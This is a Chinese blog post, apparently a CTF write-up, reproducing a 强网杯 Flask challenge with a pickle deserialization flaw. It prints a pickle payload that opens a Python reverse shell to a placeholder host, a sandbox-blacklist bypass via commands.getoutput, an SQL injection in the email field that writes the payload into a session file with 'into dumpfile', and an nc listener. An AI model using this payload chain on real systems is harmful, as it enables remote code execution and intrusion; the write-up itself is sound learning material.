复现强网杯python is the best language 2

最新推荐文章于 2024-08-08 17:00:12 发布
最新推荐文章于 2024-08-08 17:00:12 发布
阅读量286 收藏
点赞数
文章标签: shell python php
原文链接:https://yq.aliyun.com/articles/654395
版权

参考文献:https://xz.aliyun.com/t/2219
http://120.77.209.122/index.php/archives/25/

源码下载下来后,是基于flask框架,先查看路由文件routes.py,里面功能大部分是基于登陆的。

others.py的最后有这样的内容

img_5bd28a6a0932c06334b558cca3b90a3f.png
2.png

load()函数有一个unpkler函数用于反序列化参数(file),如果file可控那么这就是一个反序列化漏洞。

借用下大佬的payload,理解下这个。

用下面的脚本(12.py)进行序列化payload的生成:

import os
from pickle import Pickler as Pkler
import commands
class hhh(object):
    def __reduce__(self):
        return (os.system,("whoami",))
evil = hhh()

def dump(file):
    pkler = Pkler(file)
    pkler.dump(evil)

with open("test","wb") as f:
    dump(f)

测试反序列化漏洞(13.py):

from pickle import Unpickler as Unpkler
from io import open as Open
def LOAD(file):
    unpkler = Unpkler(file)
    return Unpkler(file).load()

with Open("test","rb") as f:
    LOAD(f)

执行会12.py后,会在12.py的同级目录下生成test,执行13.py会显示出用户信息

全局搜索load()函数,发现它在Mycache.pyFileSystemCache类中有多次引用。(代码太长了,贴下有用的)

img_2e0a9ef789b2874044362c0fa3a1d53e.png
2.png

跟入_get_filename方法
img_da6a0660b922c07df972734bcc508fa2.png
2.png

可以看到将传入的字符串key进行MD5,并将其返回。通过全局搜索,发现在Mysession.py的open_session中调用了key
img_be0876b72cbe3947b56ff8665f30ff34.png
2.png

img_8f66228787ac10196d54794153debde9.png
1.png

其中self.key_prefixbdwsessions,因此假设cookie中的sesssion值为pleated,则self.key_prefix + sid即为bdwsessionspleated,然后这串字符串进行MD5得到的结果0ab5423aafb316e9c299e0bb853d0c11。这样就可以控制file了。

攻击流程
①本地生成序列化文件,并且进行十六进制编码
②通过第一关的sql注入,将本地生成的payload,写入服务器上的session文件,指定文件名为MD5(bdwsessionspleated),这样我们在访问/index的时候把cookie中的session值改为pleated,触发open_session中的self.cache.get就可以进行反序列化攻击了

沙箱逃逸
源码还设置了沙箱/黑名单来防止某些函数的执行,比如前面的os.system就被禁用了

img_a63b014f36d34f5e597ec4b486c816ee.png
2.png

此处过滤了大多数函数,但是 commands.getoutput和subprocess.Popen()并没有过滤,payload用的是 commands.getoutput 

import cPickle
import commands

class Exp(object):
    def __reduce__(self):
        return (commands.getoutput,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",)) 
e = Exp()
poc = cPickle.dumps(e)
print  '0x'+poc.encode('hex')

在注册的邮箱处填入:

test12'/**/union/**/select/**/0x63636f....../**/into/**/dumpfile/**/'/tmp/ffff/0ab5423aafb316e9c299e0bb853d0c11'#@test12.com

注册后出现Please use a different email address.。说明写入成功
然后访问http://39.107.32.29/:20000/index
抓包修改session值为pleated

反弹shell

nc -l -p 8181 -vvv

查看flag即可。

weixin_33889665
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验吧ctf
四盘山博客
07-25 3266
1/登陆一下好吗??http://ctf5.shiyanbar.com/web/wonderkun/web/index.html =' =' ctf{51d1bf8fb65a8c2406513ee8f52283e7} 2/who are you ? http://ctf5.shiyanbar.com/web/wonderkun/index.php import requests impor
Idea配置类和方法Javadoc注释
keeper42的博客
12-02 1456
配置类注释: 打开Setting,选在Editor,然后是File and Code Templates最后分别是Files中的Class ,Interface和Enum,点击class后,编辑右边的红色边框,里边是模板,将模板设置好,点击ok即可。 下边是模板中的示例代码。在新建类时,会提示description需要提前输入的,然后才会有。 /** * @program: ${PROJECT_NAME} * * @descriptio...
强网杯2018 部分web wp
Sp4rkW的博客
03-26 6531
咸鱼web手被大佬虐哭,做又做不来,只能跟着队友躺躺这样子,QWQ 题目质量很高,膜一波FlappyPig的大佬们~ 0x00 web签到 第一层: 特殊子串举例如下: 240610708、QNKCDZO、aabg7XSs、aabC9RqS 直接过 第二层: 传入param[] 数组型,error = error,过 第三层,传入MD5相等文件,附脚本如下: ...
西普学院CTF习题解析——WEB(已完成16/16)
热门推荐
乐枕的家
09-15 2万+
源西普学院实验吧 预备知识点 页面调试 审查元素 html js php asp sql 等语法基础 请求头 响应头 伪造IP SQL注入基础 XSS基础 Web常用编码 “网站后台”概念及猜解、扫描技术 脑洞 工具参考 BurpSuite Firefox_firebug Firefox_tamperdata Firefox_modifyheader 御剑 XSSEE(编码解码器) sqlma
SSTI/沙盒逃逸详细总结
devil8123665的博客
03-09 1199
一 flask 1 、基本用法 >>> [].__class__.__base__ <class 'object'> >>> [].__class__.__mro__ (<class 'list'>, <class 'object'>) >>> [].__class__.__bases__ (<class 'object'>,) 2、取子类 [].__class__.__base__.__sub
强网杯SQL题目复现php.zip
12-17
【标题】"强网杯SQL题目复现php.zip"是一个针对网络安全竞赛——强网杯的解题资源包,其中包含了与SQL(结构化查询语言)相关的挑战。这个压缩包特别关注了如何在PHP环境中重现这些SQL题目。 【描述】描述中的...
强网杯2022 pwn 赛题解析.docx
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
禁忌搜索算法Tabu Search代码复现Python
12-13
禁忌搜索(Tabu Search, TS)是属于模拟人类智能的一种优化算法。 基本流程:禁忌搜索算法在初始化的时候,在搜索空间随机生成一个初始解 i,禁忌表H置空,当前解i记为历史最优解 s,然后进入迭代的搜索过程。...
第五届强网杯全国网络安全挑战赛 题目复现(有题目附件,详解)
路baby的博客
07-26 6066
第五届强网杯全国网络安全挑战赛 题目复现(有题目附件,详解) 题目名称:签到 问卷题 BlueTeaming CipherMan ISO1995 EzTime threebody 加油各位( •̀ ω •́ )y期待与君再相逢
为什么说Python是伟大的入门语言
博客
05-23 2645
原文:Why Python is a Great First Language 作者:Elliott Hauser 翻译:黑色巧克力 本文作者列举了一些Python特性,并认为Python是最适合入门的编程语言,一起来看一下。最近发表了三篇关于我的艺术史背景是如何影响我教学的文章。现在要分享一篇,为什么Python对于青少年和成年人是入门语言的最佳选择。伟大的入门编程语言有什么特...
2018护网杯第一场 web easy tornado LTshop超详细解答
iamsongyu的博客
10-24 4867
easy tornado 这个tornado是一个python的模板,在web使用的时候给出了四个文件,可以访问,从提示中和url中可以看出,访问需要文件名+文件签名(长度为32位,计算方式为md5(cookie_secret + md5(filename)));  flag文件名题目已给出 /fllllllllllag         题目关键为如何获取cookie,在Bp抓包的情况下没有显...
python中的is、==和cmp()比较字符串
weixin_34146805的博客
11-02 1474
python 中的is、==和cmp(),比较字符串 经常写 shell 脚本知道,字符串判断可以用 =,!= 数字的判断是 -eq,-ne 等,但是 Python 确不是这样子地。所以作为慢慢要转换到用 Python 写脚本,这些基本的东西必须要掌握到骨子里! 在 Python 中比较字符串最好是使用简单逻辑操作符。例如,确定一个字符串是否和另外一个字符串匹配。正确的,你可以使用 is equa...
2020强网杯部分题目复现
m0re's blog
08-27 2529
title: 强网杯赛后总结 tags: CTF 强网先锋 Funhash <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { die('level 1 failed'); } //level 2 if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['ha.
第二届强网杯Web Writeup
dengzhasong7076的博客
03-27 649
By: l3m0n@Syclover WEB 签到 http://39.107.33.96:10000 右键源码可获得提示 第一层用数组 param1[]=1&param2[]=a 第二层依旧是用数组 param1[]=1&param2[]=a 第三层参考文章 https://crypto.stackexchange.com/questions/1434/are-ther...
【2014Esri开发者大会精彩看点】Python is the language of ArcGIS
ArcGIS产品与技术专栏
03-19 2055
得益于python丰富的库和代码的易维护性,使之快速成为适宜于ArcGIS开发的一门语言并放在的arcgis pro上。借助于python,任何用户都可以在桌面和服务器上进行空间分析、数据管理、数据转换、地图自动化和生成。 通过一个示例来看下是如何通过python基于Online实现每周干旱影响评估地图的生成。 第一步,利用python从干旱监测网站下载并提取数据。
[原题复现]强网杯 2019 WEB高明的黑客
笑花大王
02-10 833
简介 原题复现: 考察知识点:python代码编写能力。。。 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 简介 页面提示有源码可以下载,直接拼接URL www.tar.gz 下载后发现一堆php 初步考虑就是有考察根脚本编写有关 打开代码发现这些 有get、pos 还有var_dump() ...
[原题复现]2019强网杯WEB-随便注
笑花大王
02-06 657
HCTF 2018 Warmup 原题复现:https://gitee.com/xiaohua1998/qwb_2019_supersqli 考察知识点:SQL注入漏洞-堆叠注入 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 做题过程 打开页面测试注入点 //判断注入点 存在注入! ' and 1...
UnixBench分数计算与多进程测试
最新发布
qq_39280836的博客
08-08 191
在支持较好的测试机上直接运行RUN脚本即可得到测试结果。
Linux Shell编程--脚本运行与变量置换
小李学不完的博客
08-08 908
Shell脚本运行、修改权限不管脚本有没有x(可执行)权限,都可以执行、sh脚本的绝对路径执行脚本、 bash 脚本的相对路径执行脚本、bash 脚本的绝对路径执行脚本、脚本的绝对路径/相对路径(需要脚本的+x权限)、脚本的相对路径执行脚本可以发现,执行./hello.sh需要x权限】、收回权限再次使用绝对路径执行脚本、source脚本的绝对路径/相对路径执行脚本source执行脚本时,不管脚本有没有x(可执行权限
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值